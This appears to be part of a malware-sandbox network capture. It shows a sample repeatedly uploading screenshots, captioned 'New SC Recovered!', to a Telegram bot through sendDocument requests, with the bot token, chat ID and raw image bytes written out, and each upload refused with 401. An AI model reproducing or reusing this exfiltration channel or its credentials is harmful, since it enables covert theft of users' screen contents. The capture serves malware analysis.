                                                2024-07-25 22:00:59 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 66 37 30 62 32 35 32 35 35 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 66 37 30 62 32 35 32 35 35 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 31 38 2f 32 30 32 34 20 31 30 3a 31 39 3a 34 39 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcbf70b25255b6Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcbf70b25255b6Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/18/2024 10:19:49User
                                                2024-07-25 22:00:59 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:00:59 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:00:59 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:00:59 UTC7423OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:00:59 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 66 37 30 62 32 35 32 35 35 62 36 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcbf70b25255b6--
                                                2024-07-25 22:00:59 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:00:59 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.649732149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:01:11 UTC238OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcc56227d5fe15
                                                Host: api.telegram.org
                                                Content-Length: 57551
                                                Expect: 100-continue
                                                2024-07-25 22:01:11 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:01:11 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 35 36 32 32 37 64 35 66 65 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 35 36 32 32 37 64 35 66 65 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 32 36 2f 32 30 32 34 20 30 30 3a 30 30 3a 34 33 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcc56227d5fe15Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcc56227d5fe15Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/26/2024 00:00:43User
                                                2024-07-25 22:01:11 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:01:11 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:01:11 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:01:11 UTC7412OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:01:11 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 35 36 32 32 37 64 35 66 65 31 35 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcc56227d5fe15--
                                                2024-07-25 22:01:11 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:01:11 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.649733149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:01:18 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcc9f9cbbe4ea1
                                                Host: api.telegram.org
                                                Content-Length: 57551
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:01:18 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:01:18 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 39 66 39 63 62 62 65 34 65 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 39 66 39 63 62 62 65 34 65 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 33 31 2f 32 30 32 34 20 32 30 3a 30 36 3a 32 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcc9f9cbbe4ea1Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcc9f9cbbe4ea1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/31/2024 20:06:25User
                                                2024-07-25 22:01:18 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:01:18 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:01:18 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:01:18 UTC7412OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:01:18 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 39 66 39 63 62 62 65 34 65 61 31 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcc9f9cbbe4ea1--
                                                2024-07-25 22:01:19 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:01:19 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.649734149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:01:20 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dccc3999cbfb48
                                                Host: api.telegram.org
                                                Content-Length: 57551
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:01:20 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:01:20 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 63 33 39 39 39 63 62 66 62 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 63 33 39 39 39 63 62 66 62 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 30 33 2f 32 30 32 34 20 31 36 3a 34 38 3a 31 30 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dccc3999cbfb48Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dccc3999cbfb48Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/03/2024 16:48:10User
                                                2024-07-25 22:01:20 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
